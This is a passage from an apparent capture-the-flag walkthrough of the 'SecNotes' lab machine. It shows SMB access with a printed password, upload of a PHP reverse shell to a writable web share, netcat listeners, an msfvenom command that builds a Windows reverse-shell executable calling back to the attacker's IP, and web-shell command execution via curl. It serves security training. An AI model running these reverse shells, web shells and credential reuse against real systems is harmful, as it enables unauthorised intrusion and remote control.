5 :445 smb
# using creds for smb
$ smbmap -H secnotes.htb -u tyler -p '92g!mA8BGjOirkL%OG*&'
[+] IP: secnotes.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
new-site READ, WRITE
$ smbclient //secnotes.htb/new-site -U 'tyler%92g!mA8BGjOirkL%OG*&'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Sep 30 12:13:08 2021
.. D 0 Thu Sep 30 12:13:08 2021
iisstart.htm A 696 Thu Jun 21 08:26:03 2018
iisstart.png A 98757 Thu Jun 21 08:26:03 2018
# seems like :8808
# shells were not loading
# but kashz.txt file did, so we need to find a working extension
http://secnotes.htb:8808/web.php |
500 Internal server error.
# webshell not loading but its running,
# used php rev shell and worked
$ nc -lvnp 445
listening on [any] 445 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 52720
SOCKET: Shell has connected! PID: 8772
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\new-site>whoami
iis apppool\newsite
C:\inetpub\new-site>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
C:\inetpub\new-site>systeminfo
Host Name: SECNOTES
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
System Type: x64-based PC
Hotfix(s): 2 Hotfix(s) Installed.
# PrintSpoofer64.exe
# shell breaks every 1-2 min and files from ftp is cleaned out.
# putting a msfvenom shell
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=6969 -f exe -o kashz.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: kashz.exe
# get shell,
# move kashz.exe to C:\Users\Public
# run it
ALTERNATE USER
# we have creds for tyler for SMB, so we should get tyler as user.
# get php shell and using curl cmd shows whomami as tyler
$ curl "http://secnotes.htb:8808/k.php?cmd=whoami"
<pre>secnotes\tyler</pre>
# we can use powershell encoded revshell and url encode it and use with curl
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 51490
PS C:\inetpub\new-site> whoami
secnotes\tyler
Last updated